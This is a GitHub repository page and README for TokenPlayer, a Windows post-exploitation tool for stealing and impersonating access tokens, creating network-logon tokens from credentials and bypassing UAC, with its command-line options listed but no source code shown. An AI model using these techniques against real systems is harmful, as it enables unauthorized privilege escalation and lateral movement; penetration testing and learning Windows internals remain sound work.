Skip to content

S1ckB0y1337/TokenPlayer

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
TokenPlayer
TokenPlayer
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
TokenPlayer.sln
TokenPlayer.sln
 
 

Repository files navigation

TokenPlayer

Abusing and Manipulating Windows Access Tokens.

TokenPlayer is just a small tool i made to learn win32 api programming and understand better the access token model of windows.

Features:

  • Stealing and Impersonating primary tokens.
  • Impersonating Protected Processes.
  • It can be used from non-interactive contexts (e.g. reverse shell) by using pipes for parent-child process communication.
  • Making new tokens for network authentication by providing credentials (similar to runas /netonly) without the need for special rights or elevated context.
  • Bypassing UAC by using the Token-Duplication method.

Usage:

General options:
  --help                 Display help menu.

Impersonation Options:
  --impersonate          Impersonates the specified pid and spawns a new child
                         process under its context.
  --pid arg              Proccess ID to steal the token from.
  --spawn                Spawns a new command prompt under the context of the
                         stolen token.

Execution Options:
  --exec                 Execute an instance of a specified program under the
                         impersonated context.
  --pid arg              Proccess ID to steal the token from.
  --prog                 The full path to the program to be executed.
  --args                 Optional execution arguments for the specified
                         program.

Make Token Options:
  --maketoken            Create a new process under a set of creds for only
                         network authentication (Similar to runas /netonly).
  --username arg         Username
  --password arg         Password in plaintext format.
  --domain arg           The domain the user belongs, if domain isn't specified
                         the local machine will be used.

UAC Bypass Options:
  --pwnuac               Will try to bypass UAC using the token-duplication
                         method.
  --spawn                Spawns a new elevated prompt.

Compile Instructions

To compile it yourself you will need to install the boost library, because it uses it for parsing and handling the command line arguments. Also you'll need to specify the external library's folder on the project's settings.

References

About

Manipulating and Abusing Windows Access Tokens.

Topics

windows tokens post-exploitation uac-bypass pentest-tool windows-privilege-escalation windows-internals windows-security lateral-movement

Resources

Readme

License

MIT license
Activity

Stars

287 stars

Watchers

5 watching

Forks

48 forks
Report repository

Releases 5

TokenPlayer v0.8 Latest
Jan 15, 2021
+ 4 releases

Packages

No packages published

Languages